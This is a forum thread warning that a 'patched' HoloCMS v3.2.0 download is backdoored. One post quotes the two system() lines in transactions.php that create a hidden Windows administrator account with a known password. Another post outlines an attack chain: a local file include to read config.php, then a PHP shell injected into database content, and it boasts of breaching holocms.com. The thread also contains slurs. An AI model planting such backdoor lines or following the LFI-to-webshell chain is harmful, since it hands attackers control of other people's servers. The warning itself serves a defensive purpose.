HoloCMS v3.2.0 (Patched Edition)

[Pixalz]

Nice, recommedd to use.

[Mark1994123]

WARNING - THIS IS A VIRUS !

IF U DONT BELIEVE ME , DOWNLOAD IT

BUT I HAVE WARNED YOU!!!

Mark

[Retro!]

transactions - WARNING WARNING! Virus found! sorry about the font size, I just saw three more people downloading it after this post. (And we have a winner), take a look at line 122 and 123 of transactions.

Code:

system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");

What this does is it adds an administrator user with a password the guy knows. In other words, if you use this, you now have a backdoor on your server.

In other words, just like the crap j00p released a few days ago, but in a different area, this fixes ZERO security exploits (other then the one I told you guys about a while ago), it puts a backdoor on your server so the guy can take over it. DO NOT USE! Since this is the second time this happens, I advice you people to not use ANY holocms release that is not from me (unless I say so otherwise).

Also, the ONLY KNOWN exploit is the one in me.php, I'll be updateing the HoloCMS thread with a patch later.

EDIT: Your virus scanner won't show anything!!! This isn't an exe file, it's a plain-text file, so virus scanners skip over it, AND the fact that it doesn't do harm to your computer, it opens a back door which allows the attacker to have administrator access to your computer/server THEN they can do the harm. Very sneaky.

EDIT 2: Lol at PM from Pixalz , either he's in on the whole thing or he's the most ignorant guy here. Wait, I take that back. He's the most stupid ignorant guy here.

So,
Habmoon.
There is a virus found.
Also,
I doubt he'd lie about it ott1:

[HabMoon]

Sorry [a] stupid me, but i was still right at the dont download part ^,^

I hate threads like this.. >.<

[yifan_lu]

So,
Habmoon.
There is a virus found.
Also,
I doubt he'd lie about it ott1:

yes there is a virus + a keylogger in file

Ok, the term virus is kinda misleading. It doesn't IMMEDIATELY do damage to your computer as a virus does. It creates a administrator account under the name 'letmein' with no password. It will ONLY do harm when the attacker logs in to your server and does things. It is a "backdoor Trojan".

No, there is no keylogger.

Also if you have ANY doubt of what I'm saying, just download the file and open transactions.php with any text editor (Notepad), scroll to the end of the file (line 122+123 to be exact) and see the two lines.

[gonzalarcon]

+1 for oldschool servers! (little joke, don't get angry holo-users :P)

[DjMaster2]

WTF? is it a virus or not? so i can or cant download, Yifan_lu, make a thread about this CMS so we can download it.

[gonzalarcon]

It's like a open door for a virus

[Mr. Oni]

When you backdoored this you forgot to add a meta tag so that you could find all the installations of this on google

I rate your faggotry 10/10

[Mr. Oni]

I just realised as well that this is the most retarded of ways to backdoor a system. For a start most PHP installations have system() disabled by default (including xampp).

Secondly, if you're going to backdoor, do it right. Add an LFI (local file include) and use that to read the config.php file. This will bypass all chmod permissions as it is in the same directory, so just use include() to bypass safe_mode, open_basedir etc. Then use that to get into the database, and you can inject a PHP shell into the title tables in the database (for example the credits.php "How can I buy credits" table)

Then when you visit credits.php, the PHP shell will be there and because you injected it into the PHP from MySQL, the system is none the wiser and the file is still owned by owner. This will pretty much allow you to modify any of the HoloCMS files.

LFI is the method that I used to successfully compromise holocms.com and damaged can be reduced by CHMODing all the files 6**, so they are only readable by the owner.

Learn 2 hack please

[funkycrossboy]

register not woorking lol fix it?


-DJ-Texy habbohacker and holoCMS user

[Mark1994123]

Can some Give me the V32 Index ? The same as this cms but WITHOUT the virus?

Mark,

[NitroHabbz]

All i'll say is.

If you use this then your basically giving apellido or anyone else whos in on his little noob hacking attempt root access to your servers.

Nice try though apellido. Like Mr.*** said.

Learn to hack.

[oblesque]

Do Not Download

Virus (Backdoor hacker)

[jamz13]

Why does everyone call me Sisja in stead of Sisija

S i s i j a

Offtopic:(Who Cares) Lol xD